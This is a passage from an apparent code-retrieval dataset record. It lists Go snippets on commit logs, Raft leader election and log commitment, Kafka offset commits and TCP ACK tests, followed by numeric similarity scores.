opts)\n\t)\n\n\t// One goroutine continuously writing.\n\tgo func() {\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-doneCh:\n\t\t\t\treturn\n\t\t\tdefault:\n\t\t\t\ttime.Sleep(time.Millisecond)\n\t\t\t\terr := commitLog.Write(\n\t\t\t\t\tcontext.NewBackground(),\n\t\t\t\t\ttestSeries(t, opts, 0, \"foo.bar\", testTags1, 127),\n\t\t\t\t\tts.Datapoint{},\n\t\t\t\t\txtime.Second,\n\t\t\t\t\tnil)\n\t\t\t\tif err == errCommitLogClosed {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif err == ErrCommitLogQueueFull {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tif err != nil {\n\t\t\t\t\tpanic(err)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}()\n\n\t// One goroutine continuously rotating the logs.\n\tgo func() {\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-doneCh:\n\t\t\t\treturn\n\t\t\tdefault:\n\t\t\t\ttime.Sleep(time.Millisecond)\n\t\t\t\t_, err := commitLog.RotateLogs()\n\t\t\t\tif err == errCommitLogClosed {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif err != nil {\n\t\t\t\t\tpanic(err)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}()\n\n\t// One goroutine continuously checking active logs.\n\tgo func() {\n\t\tvar (\n\t\t\tlastSeenFile string\n\t\t\tnumFilesSeen int\n\t\t)\n\t\tfor numFilesSeen < numFilesRequired {\n\t\t\ttime.Sleep(100 * time.Millisecond)\n\t\t\tlogs, err := commitLog.ActiveLogs()\n\t\t\tif err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t\trequire.Equal(t, 2, len(logs))\n\t\t\tif logs[0].FilePath != lastSeenFile {\n\t\t\t\tlastSeenFile = logs[0].FilePath\n\t\t\t\tnumFilesSeen++\n\t\t\t}\n\t\t}\n\t\tclose(doneCh)\n\t}()\n\n\t<-doneCh\n\n\trequire.NoError(t, commitLog.Close())\n}", "func TestBroker(t *testing.T) {\n\tcommitteeMock, keys := agreement.MockCommittee(2, true, 2)\n\teb, roundChan := initAgreement(committeeMock)\n\n\thash, _ := crypto.RandEntropy(32)\n\teb.Publish(string(topics.Agreement), agreement.MockAgreement(hash, 1, 1, keys))\n\teb.Publish(string(topics.Agreement), agreement.MockAgreement(hash, 1, 1, keys))\n\n\tround := <-roundChan\n\tassert.Equal(t, uint64(2), round)\n}", "func (d *dispatcher) dispatchBlockCommit(msg proto.Message, done chan bool) {\n\tif atomic.LoadInt32(&d.shutdown) != 0 {\n\t\tif done != nil {\n\t\t\tclose(done)\n\t\t}\n\t\treturn\n\t}\n\td.newsChan <- &blockMsg{(msg).(*pb.BlockPb), pb.MsgBlockProtoMsgType, done}\n}", "func (c *KafkaClient) CommitOffset(group string, topic string, partition int32, offset int64) error {\n\tfor i := 0; i <= c.config.CommitOffsetRetries; i++ {\n\t\terr := c.tryCommitOffset(group, topic, partition, offset)\n\t\tif err == nil {\n\t\t\treturn nil\n\t\t}\n\n\t\tlog.Debugf(\"Failed to commit offset %d for group %s, topic %s, partition %d after %d try: %s\", offset, group, topic, partition, i, err)\n\t\ttime.Sleep(c.config.CommitOffsetBackoff)\n\t}\n\n\treturn fmt.Errorf(\"Could not get commit offset %d for group %s, topic %s, partition %d after %d retries\", offset, group, topic, partition, c.config.CommitOffsetRetries)\n}", "func TestCommitMultipleKeys4A(t *testing.T) {\n}", "func (_BaseLibrary *BaseLibraryTransactor) ConfirmCommit(opts *bind.TransactOpts) (*types.Transaction, error) {\n\treturn _BaseLibrary.contract.Transact(opts, \"confirmCommit\")\n}", "func (m *MockAtomicLogic) Commit() error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Commit\")\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (suite *KeeperTestSuite) TestGetAllPacketCommitmentsAtChannel() {\n\tpath := ibctesting.NewPath(suite.chainA, suite.chainB)\n\tsuite.coordinator.Setup(path)\n\n\t// create second channel\n\tpath1 := ibctesting.NewPath(suite.chainA, suite.chainB)\n\tpath1.SetChannelOrdered()\n\tpath1.EndpointA.ClientID = path.EndpointA.ClientID\n\tpath1.EndpointB.ClientID = path.EndpointB.ClientID\n\tpath1.EndpointA.ConnectionID = path.EndpointA.ConnectionID\n\tpath1.EndpointB.ConnectionID = path.EndpointB.ConnectionID\n\n\tsuite.coordinator.CreateMockChannels(path1)\n\n\tctxA := suite.chainA.GetContext()\n\texpectedSeqs := make(map[uint64]bool)\n\thash := []byte(\"commitment\")\n\n\tseq := uint64(15)\n\tmaxSeq := uint64(25)\n\tsuite.Require().Greater(maxSeq, seq)\n\n\t// create consecutive commitments\n\tfor i := uint64(1); i < seq; i++ {\n\t\tsuite.chainA.App.GetIBCKeeper().ChannelKeeper.SetPacketCommitment(ctxA, path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID, i, hash)\n\t\texpectedSeqs[i] = true\n\t}\n\n\t// add non-consecutive commitments\n\tfor i := seq; i < maxSeq; i += 2 {\n\t\tsuite.chainA.App.GetIBCKeeper().ChannelKeeper.SetPacketCommitment(ctxA, path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID, i, hash)\n\t\texpectedSeqs[i] = true\n\t}\n\n\t// add sequence on different channel/port\n\tsuite.chainA.App.GetIBCKeeper().ChannelKeeper.SetPacketCommitment(ctxA, path1.EndpointA.ChannelConfig.PortID, path1.EndpointA.ChannelID, maxSeq+1, hash)\n\n\tcommitments := suite.chainA.App.GetIBCKeeper().ChannelKeeper.GetAllPacketCommitmentsAtChannel(ctxA, path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID)\n\n\tsuite.Equal(len(expectedSeqs), len(commitments))\n\t// ensure above for loops occurred\n\tsuite.NotEqual(0, len(commitments))\n\n\t// verify that all the packet commitments were stored\n\tfor _, packet := range commitments {\n\t\tsuite.True(expectedSeqs[packet.Sequence])\n\t\tsuite.Equal(path.EndpointA.ChannelConfig.PortID, packet.PortId)\n\t\tsuite.Equal(path.EndpointA.ChannelID, packet.ChannelId)\n\t\tsuite.Equal(hash, packet.Data)\n\n\t\t// prevent duplicates from passing checks\n\t\texpectedSeqs[packet.Sequence] = false\n\t}\n}", "func TestV3ElectionObserve(t *testing.T) {\n\tintegration.BeforeTest(t)\n\tclus := integration.NewCluster(t, &integration.ClusterConfig{Size: 1})\n\tdefer clus.Terminate(t)\n\n\tlc := integration.ToGRPC(clus.Client(0)).Election\n\n\t// observe leadership events\n\tobservec := make(chan struct{}, 1)\n\tgo func() {\n\t\tdefer close(observec)\n\t\ts, err := lc.Observe(context.Background(), &epb.LeaderRequest{Name: []byte(\"foo\")})\n\t\tobservec <- struct{}{}\n\t\tif err != nil {\n\t\t\tt.Error(err)\n\t\t}\n\t\tfor i := 0; i < 10; i++ {\n\t\t\tresp, rerr := s.Recv()\n\t\t\tif rerr != nil {\n\t\t\t\tt.Error(rerr)\n\t\t\t}\n\t\t\trespV := 0\n\t\t\tfmt.Sscanf(string(resp.Kv.Value), \"%d\", &respV)\n\t\t\t// leader transitions should not go backwards\n\t\t\tif respV < i {\n\t\t\t\tt.Errorf(`got observe value %q, expected >= \"%d\"`, string(resp.Kv.Value), i)\n\t\t\t}\n\t\t\ti = respV\n\t\t}\n\t}()\n\n\tselect {\n\tcase <-observec:\n\tcase <-time.After(time.Second):\n\t\tt.Fatalf(\"observe stream took too long to start\")\n\t}\n\n\tlease1, err1 := integration.ToGRPC(clus.RandClient()).Lease.LeaseGrant(context.TODO(), &pb.LeaseGrantRequest{TTL: 30})\n\tif err1 != nil {\n\t\tt.Fatal(err1)\n\t}\n\tc1, cerr1 := lc.Campaign(context.TODO(), &epb.CampaignRequest{Name: []byte(\"foo\"), Lease: lease1.ID, Value: []byte(\"0\")})\n\tif cerr1 != nil {\n\t\tt.Fatal(cerr1)\n\t}\n\n\t// overlap other leader so it waits on resign\n\tleader2c := make(chan struct{})\n\tgo func() {\n\t\tdefer close(leader2c)\n\n\t\tlease2, err2 := integration.ToGRPC(clus.RandClient()).Lease.LeaseGrant(context.TODO(), &pb.LeaseGrantRequest{TTL: 30})\n\t\tif err2 != nil {\n\t\t\tt.Error(err2)\n\t\t}\n\t\tc2, cerr2 := lc.Campaign(context.TODO(), &epb.CampaignRequest{Name: []byte(\"foo\"), Lease: lease2.ID, Value: []byte(\"5\")})\n\t\tif cerr2 != nil {\n\t\t\tt.Error(cerr2)\n\t\t}\n\t\tfor i := 6; i < 10; i++ {\n\t\t\tv := []byte(fmt.Sprintf(\"%d\", i))\n\t\t\treq := &epb.ProclaimRequest{Leader: c2.Leader, Value: v}\n\t\t\tif _, err := lc.Proclaim(context.TODO(), req); err != nil {\n\t\t\t\tt.Error(err)\n\t\t\t}\n\t\t}\n\t}()\n\n\tfor i := 1; i < 5; i++ {\n\t\tv := []byte(fmt.Sprintf(\"%d\", i))\n\t\treq := &epb.ProclaimRequest{Leader: c1.Leader, Value: v}\n\t\tif _, err := lc.Proclaim(context.TODO(), req); err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n\t// start second leader\n\tlc.Resign(context.TODO(), &epb.ResignRequest{Leader: c1.Leader})\n\n\tselect {\n\tcase <-observec:\n\tcase <-time.After(time.Second):\n\t\tt.Fatalf(\"observe did not observe all events in time\")\n\t}\n\n\t<-leader2c\n}", "func TestSplit(t *testing.T){\r\n\tif !TESTSPLIT{\r\n\t\treturn\r\n\t}\r\n\tcontents := make([]string, 2)\r\n\tcontents[0] = \"duckduck\"\r\n\tcontents[1] = \"go\"\r\n\tmkcl, err := mock.NewCluster(\"input_spec.json\")\r\n\trafts,err := makeMockRafts(mkcl,\"log\", 250, 350) \r\n\tcheckError(t,err, \"While creating mock clusters\")\r\n\ttime.Sleep(5*time.Second)\r\n\trafts[0].Append([]byte(contents[0]))\r\n\ttime.Sleep(5*time.Second)\r\n\tmkcl.Lock()\r\n\tpart1 := []int{1,3}\r\n\tpart2 := []int{2,4}\r\n\trafts[1].smLock.RLock()\r\n\tldrId := rafts[4].LeaderId()\r\n\trafts[1].smLock.RUnlock()\r\n\tfmt.Printf(\"ldrId:%v\\n\", ldrId)\r\n\tif ldrId % 2 == 0{\r\n\t\tpart2 = append(part2, 5)\r\n\t}else{\r\n\t\tpart1 = append(part1, 5)\r\n\t}\r\n\tmkcl.Unlock()\r\n\tmkcl.Partition(part1, part2)\r\n\tdebugRaftTest(fmt.Sprintf(\"Partitions: %v %v\\n\", part1, part2))\r\n\ttime.Sleep(4*time.Second)\r\n\tmkcl.Lock()\r\n\trafts[ldrId-1].Append([]byte(contents[1]))\r\n\tmkcl.Unlock()\r\n\ttime.Sleep(8*time.Second)\r\n\tmkcl.Heal()\r\n\tdebugRaftTest(fmt.Sprintf(\"Healed\\n\"))\r\n\ttime.Sleep(8*time.Second)\r\n\tciarr := []int{0,0,0,0,0}\r\n\tfor cnt:=0;cnt<5;{\r\n\t\tfor idx, node := range rafts {\r\n\t\t\tselect {\r\n\t\t\tcase ci := <-node.CommitChannel():\r\n\t\t\t\tif ci.Err != nil {\r\n\t\t\t\t\tfmt.Fprintln(os.Stderr,ci.Err)\r\n\t\t\t\t}\r\n\t\t\t\t//Testing CommitChannel \r\n\t\t\t\texpect(t,contents[ciarr[idx]],string(ci.Data))\r\n\t\t\t\tciarr[idx] += 1\r\n\t\t\t\tif ciarr[idx] == 2{\r\n\t\t\t\t\tcnt +=1 \r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\tfor _, node := range rafts {\r\n\t\tnode.smLock.RLock()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"%v\", node.sm.String()))\r\n\t\tnode.smLock.RUnlock()\r\n\t\tnode.Shutdown()\r\n\t}\r\n}", "func (c *offsetCoordinator) Commit(topic string, partition int32, offset int64) error {\n\treturn c.commit(topic, partition, offset, \"\")\n}", "func testLeaderCycle(t *testing.T, preVote bool) {\n\tvar cfg func(*Config)\n\tif preVote {\n\t\tcfg = preVoteConfig\n\t}\n\tn := newNetworkWithConfig(cfg, nil, nil, nil)\n\tdefer n.closeAll()\n\tfor campaignerID := uint64(1); campaignerID <= 3; campaignerID++ {\n\t\tn.send(pb.Message{From: campaignerID, To: campaignerID, Type: pb.MsgHup})\n\n\t\tfor _, peer := range n.peers {\n\t\t\tsm := peer.(*raft)\n\t\t\tif sm.id == campaignerID && sm.state != StateLeader {\n\t\t\t\tt.Errorf(\"preVote=%v: campaigning node %d state = %v, want StateLeader\",\n\t\t\t\t\tpreVote, sm.id, sm.state)\n\t\t\t} else if sm.id != campaignerID && sm.state != StateFollower {\n\t\t\t\tt.Errorf(\"preVote=%v: after campaign of node %d, \"+\n\t\t\t\t\t\"node %d had state = %v, want StateFollower\",\n\t\t\t\t\tpreVote, campaignerID, sm.id, sm.state)\n\t\t\t}\n\t\t}\n\t}\n}", "func (p *protocol) Acknowledge(nonce *string, sequence uint32) error {\n\tlog.Debugf(\"[R %s > %s] Sending acknowledgement for nonce %x with sequence %d\", p.conn.LocalAddr().String(), p.conn.RemoteAddr().String(), *nonce, sequence)\n\treturn p.conn.SendMessage(&protocolACKN{nonce: nonce, sequence: sequence})\n}", "func (_m *Consumer) Commit() ([]kafka.TopicPartition, error) {\n\tret := _m.Called()\n\n\tvar r0 []kafka.TopicPartition\n\tif rf, ok := ret.Get(0).(func() []kafka.TopicPartition); ok {\n\t\tr0 = rf()\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).([]kafka.TopicPartition)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func() error); ok {\n\t\tr1 = rf()\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func TestAckOTWSeqInClosing(t *testing.T) {\n\tfor seqNumOffset := seqnum.Size(0); seqNumOffset < 3; seqNumOffset++ {\n\t\tfor _, tt := range []struct {\n\t\t\tdescription string\n\t\t\tflags header.TCPFlags\n\t\t\tpayloads testbench.Layers\n\t\t}{\n\t\t\t{\"SYN\", header.TCPFlagSyn, nil},\n\t\t\t{\"SYNACK\", header.TCPFlagSyn | header.TCPFlagAck, nil},\n\t\t\t{\"ACK\", header.TCPFlagAck, nil},\n\t\t\t{\"FINACK\", header.TCPFlagFin | header.TCPFlagAck, nil},\n\t\t\t{\"Data\", header.TCPFlagAck, []testbench.Layer{&testbench.Payload{Bytes: []byte(\"abc123\")}}},\n\t\t} {\n\t\t\tt.Run(fmt.Sprintf(\"%s%d\", tt.description, seqNumOffset), func(t *testing.T) {\n\t\t\t\tdut := testbench.NewDUT(t)\n\t\t\t\tlistenFD, remotePort := dut.CreateListener(t, unix.SOCK_STREAM, unix.IPPROTO_TCP, 1)\n\t\t\t\tdefer dut.Close(t, listenFD)\n\t\t\t\tconn := dut.Net.NewTCPIPv4(t, testbench.TCP{DstPort: &remotePort}, testbench.TCP{SrcPort: &remotePort})\n\t\t\t\tdefer conn.Close(t)\n\t\t\t\tconn.Connect(t)\n\t\t\t\tacceptFD, _ := dut.Accept(t, listenFD)\n\t\t\t\tdefer dut.Close(t, acceptFD)\n\n\t\t\t\tdut.Shutdown(t, acceptFD, unix.SHUT_WR)\n\n\t\t\t\tif _, err := conn.Expect(t, testbench.TCP{Flags: testbench.TCPFlags(header.TCPFlagFin | header.TCPFlagAck)}, time.Second); err != nil {\n\t\t\t\t\tt.Fatalf(\"expected FINACK from DUT, but got none: %s\", err)\n\t\t\t\t}\n\n\t\t\t\t// Do not ack the FIN from DUT so that the TCP state on DUT is CLOSING instead of CLOSED.\n\t\t\t\tseqNumForTheirFIN := testbench.Uint32(uint32(*conn.RemoteSeqNum(t)) - 1)\n\t\t\t\tconn.Send(t, testbench.TCP{AckNum: seqNumForTheirFIN, Flags: testbench.TCPFlags(header.TCPFlagFin | header.TCPFlagAck)})\n\n\t\t\t\tif _, err := conn.Expect(t, testbench.TCP{Flags: testbench.TCPFlags(header.TCPFlagAck)}, time.Second); err != nil {\n\t\t\t\t\tt.Errorf(\"expected an ACK to our FIN, but got none: %s\", err)\n\t\t\t\t}\n\n\t\t\t\twindowSize := seqnum.Size(*conn.SynAck(t).WindowSize) + seqNumOffset\n\t\t\t\tconn.SendFrameStateless(t, conn.CreateFrame(t, testbench.Layers{&testbench.TCP{\n\t\t\t\t\tSeqNum: testbench.Uint32(uint32(conn.LocalSeqNum(t).Add(windowSize))),\n\t\t\t\t\tAckNum: seqNumForTheirFIN,\n\t\t\t\t\tFlags: testbench.TCPFlags(tt.flags),\n\t\t\t\t}}, tt.payloads...))\n\n\t\t\t\tif _, err := conn.Expect(t, testbench.TCP{Flags: testbench.TCPFlags(header.TCPFlagAck)}, time.Second); err != nil {\n\t\t\t\t\tt.Errorf(\"expected an ACK but got none: %s\", err)\n\t\t\t\t}\n\t\t\t})\n\t\t}\n\t}\n}", "func (buf *Buffer) ACK(leased *Batch) {\n\tbuf.removeLease(leased)\n}", "func TestStep0Committee(t *testing.T) {\n\tassert.NotPanics(t, func() {\n\t\tp, ks := consensus.MockProvisioners(10)\n\t\th := committee.NewHandler(ks[0], *p)\n\t\th.AmMember(1, 0, 10)\n\t})\n}" ]
[ "0.6636693", "0.6383855", "0.6223964", "0.61065626", "0.6075896", "0.60401034", "0.60329896", "0.6028253", "0.59614366", "0.59245425", "0.58974385", "0.5846647", "0.5833662", "0.58287334", "0.57737565", "0.57682055", "0.57222724", "0.57091546", "0.570812", "0.5635217", "0.5623159", "0.55632085", "0.55368245", "0.5526325", "0.55256164", "0.55220485", "0.5500707", "0.5466739", "0.5456748", "0.54206306", "0.5399767", "0.5374135", "0.5367836", "0.5361262", "0.53568107", "0.5292634", "0.5285075", "0.5283941", "0.5264674", "0.5221534", "0.5192582", "0.51899064", "0.51712173", "0.51369894", "0.513258", "0.51325285", "0.5116454", "0.50892824", "0.5089138", "0.5076121", "0.50720835", "0.50532854", "0.5047244", "0.50431025", "0.5042832", "0.5031107", "0.50155485", "0.5007315", "0.499875", "0.49908042", "0.49840218", "0.49823028", "0.4981271", "0.49803168", "0.49789974", "0.49681765", "0.49681383", "0.49613774", "0.49597192", "0.49485806", "0.4942101", "0.49344352", "0.4931703", "0.49302667", "0.49272126", "0.49244973", "0.49125144", "0.48984867", "0.4893759", "0.4883302", "0.48804277", "0.48767918", "0.48751807", "0.48734915", "0.48723385", "0.48708904", "0.4865145", "0.48609468", "0.48543918", "0.4853313", "0.4851935", "0.4842324", "0.4834144", "0.48069406", "0.47977495", "0.47875652", "0.47853202", "0.4778252", "0.47779", "0.47640824" ]
0.8480067
0
TestFollowerCommitEntry tests that once a follower learns that a log entry is committed, it applies the entry to its local state machine (in log order). Reference: section 5.3
func TestFollowerCommitEntry(t *testing.T) { tests := []struct { ents []pb.Entry commit uint64 }{ { []pb.Entry{ {Term: 1, Index: 1, Data: []byte("some data")}, }, 1, }, { []pb.Entry{ {Term: 1, Index: 1, Data: []byte("some data")}, {Term: 1, Index: 2, Data: []byte("some data2")}, }, 2, }, { []pb.Entry{ {Term: 1, Index: 1, Data: []byte("some data2")}, {Term: 1, Index: 2, Data: []byte("some data")}, }, 2, }, { []pb.Entry{ {Term: 1, Index: 1, Data: []byte("some data")}, {Term: 1, Index: 2, Data: []byte("some data2")}, }, 1, }, } for i, tt := range tests { r := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage()) defer closeAndFreeRaft(r) r.becomeFollower(1, 2) r.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 1, Entries: tt.ents, Commit: tt.commit}) if g := r.raftLog.committed; g != tt.commit { t.Errorf("#%d: committed = %d, want %d", i, g, tt.commit) } wents := tt.ents[:int(tt.commit)] if g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) { t.Errorf("#%d: nextEnts = %v, want %v", i, g, wents) } } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func TestLeaderCommitEntry(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tfor _, m := range r.readMessages() {\n\t\tr.Step(acceptAndReply(m))\n\t}\n\n\tif g := r.raftLog.committed; g != li+1 {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li+1)\n\t}\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"nextEnts = %+v, want %+v\", g, wents)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\tfor i, m := range msgs {\n\t\tif w := uint64(i + 2); m.To != w {\n\t\t\tt.Errorf(\"to = %x, want %x\", m.To, w)\n\t\t}\n\t\tif m.Type != pb.MsgApp {\n\t\t\tt.Errorf(\"type = %v, want %v\", m.Type, pb.MsgApp)\n\t\t}\n\t\tif m.Commit != li+1 {\n\t\t\tt.Errorf(\"commit = %d, want %d\", m.Commit, li+1)\n\t\t}\n\t}\n}", "func (rf *Raft) FollowerCommit(leaderCommit int, m int) {\n\t//fmt.Printf(\"hi:%v \\n\", p)\n\tp := rf.commitIndex\n\tif leaderCommit > rf.commitIndex {\n\t\tif leaderCommit < m {\n\t\t\trf.commitIndex = leaderCommit\n\t\t} else {\n\t\t\trf.commitIndex = m\n\t\t}\n\t}else{\n\t\t//fmt.Printf(\"leaderCommit:%v rf.commitIndex:%v \\n\", leaderCommit, rf.commitIndex)\n\t}\n\tfor p++; p <= rf.commitIndex; p++ {\n\t\trf.applyCh <- ApplyMsg{Index:p, Command:rf.log[p-rf.log[0].Index].Command}\n\t\trf.lastApplied = p\n\t}\n\t//fmt.Printf(\"done \\n\")\n\t//fmt.Printf(\"server %v term %v role %v last append %v \\n\", rf.me, rf.currentTerm, rf.role, rf.lastApplied)\n}", "func (s *SharedLog_) Commit_follower(Entry_pre LogEntry_, Entry_cur LogEntry_, conn net.Conn) bool {\n\tse := r.GetServer(r.id)\n\ti := len(r.log.Entries)\n\tif i == 1{\n\t\tif r.log.Entries[i-1].Term == Entry_cur.Term && r.log.Entries[i-1].SequenceNumber == Entry_cur.SequenceNumber{\n\t\t\t raft.Input_ch <- raft.String_Conn{string(r.log.Entries[i-1].Command), conn}\n\t\t\t\tr.log.Entries[i-1].IsCommitted = true\n\t\t\t\tse.LsnToCommit++\n\t\t\t\treturn true\n\t\t}// end of inner if\n\t} //end i == 1\n\t\n\tif i>1{\n\t\tif r.log.Entries[i-2].Term == Entry_pre.Term && r.log.Entries[i-2].SequenceNumber == Entry_pre.SequenceNumber{\n\t\t\tif r.log.Entries[i-1].Term == Entry_cur.Term && r.log.Entries[i-1].SequenceNumber == Entry_cur.SequenceNumber{\n\t\t\t\traft.Input_ch <- raft.String_Conn{string(r.log.Entries[i-1].Command), conn}\n\t\t\t\tr.log.Entries[i-1].IsCommitted = true\n\t\t\t\tse.LsnToCommit++\n\t\t\t\treturn true\n\t\t\t}//end of cur_entry\n\t\t}//end of prev_entry\n\t}//end of index check\n\treturn false\n}", "func TestCommitWithoutNewTermEntry(t *testing.T) {\n\ttt := newNetwork(nil, nil, nil, nil, nil)\n\tdefer tt.closeAll()\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// 0 cannot reach 2,3,4\n\ttt.cut(1, 3)\n\ttt.cut(1, 4)\n\ttt.cut(1, 5)\n\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tsm := tt.peers[1].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\t// network recovery\n\ttt.recover()\n\n\t// elect 1 as the new leader with term 2\n\t// after append a ChangeTerm entry from the current term, all entries\n\t// should be committed\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\tif sm.raftLog.committed != 4 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 4)\n\t}\n}", "func TestLeaderAcknowledgeCommit(t *testing.T) {\n\ttests := []struct {\n\t\tsize int\n\t\tacceptors map[uint64]bool\n\t\twack bool\n\t}{\n\t\t{1, nil, true},\n\t\t{3, nil, false},\n\t\t{3, map[uint64]bool{2: true}, true},\n\t\t{3, map[uint64]bool{2: true, 3: true}, true},\n\t\t{5, nil, false},\n\t\t{5, map[uint64]bool{2: true}, false},\n\t\t{5, map[uint64]bool{2: true, 3: true}, true},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true}, true},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, true},\n\t}\n\tfor i, tt := range tests {\n\t\ts := NewMemoryStorage()\n\t\tr := newTestRaft(1, idsBySize(tt.size), 10, 1, s)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeCandidate()\n\t\tr.becomeLeader()\n\t\tcommitNoopEntry(r, s)\n\t\tli := r.raftLog.lastIndex()\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\t\tfor _, m := range r.readMessages() {\n\t\t\tif tt.acceptors[m.To] {\n\t\t\t\tr.Step(acceptAndReply(m))\n\t\t\t}\n\t\t}\n\n\t\tif g := r.raftLog.committed > li; g != tt.wack {\n\t\t\tt.Errorf(\"#%d: ack commit = %v, want %v\", i, g, tt.wack)\n\t\t}\n\t}\n}", "func TestLeaderSyncFollowerLog(t *testing.T) {\n\tents := []pb.Entry{\n\t\t{},\n\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t}\n\tterm := uint64(8)\n\ttests := [][]pb.Entry{\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10}, {Term: 6, Index: 11},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t\t\t{Term: 7, Index: 11}, {Term: 7, Index: 12},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 4, Index: 6}, {Term: 4, Index: 7},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 2, Index: 4}, {Term: 2, Index: 5}, {Term: 2, Index: 6},\n\t\t\t{Term: 3, Index: 7}, {Term: 3, Index: 8}, {Term: 3, Index: 9}, {Term: 3, Index: 10}, {Term: 3, Index: 11},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tleadStorage := NewMemoryStorage()\n\t\tdefer leadStorage.Close()\n\t\tleadStorage.Append(ents)\n\t\tlead := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, leadStorage)\n\t\tlead.loadState(pb.HardState{Commit: lead.raftLog.lastIndex(), Term: term})\n\t\tfollowerStorage := NewMemoryStorage()\n\t\tdefer followerStorage.Close()\n\t\tfollowerStorage.Append(tt)\n\t\tfollower := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, followerStorage)\n\t\tfollower.loadState(pb.HardState{Term: term - 1})\n\t\t// It is necessary to have a three-node cluster.\n\t\t// The second may have more up-to-date log than the first one, so the\n\t\t// first node needs the vote from the third node to become the leader.\n\t\tn := newNetwork(lead, follower, nopStepper)\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\t// The election occurs in the term after the one we loaded with\n\t\t// lead.loadState above.\n\t\tn.send(pb.Message{From: 3, To: 1, Type: pb.MsgVoteResp, Term: term + 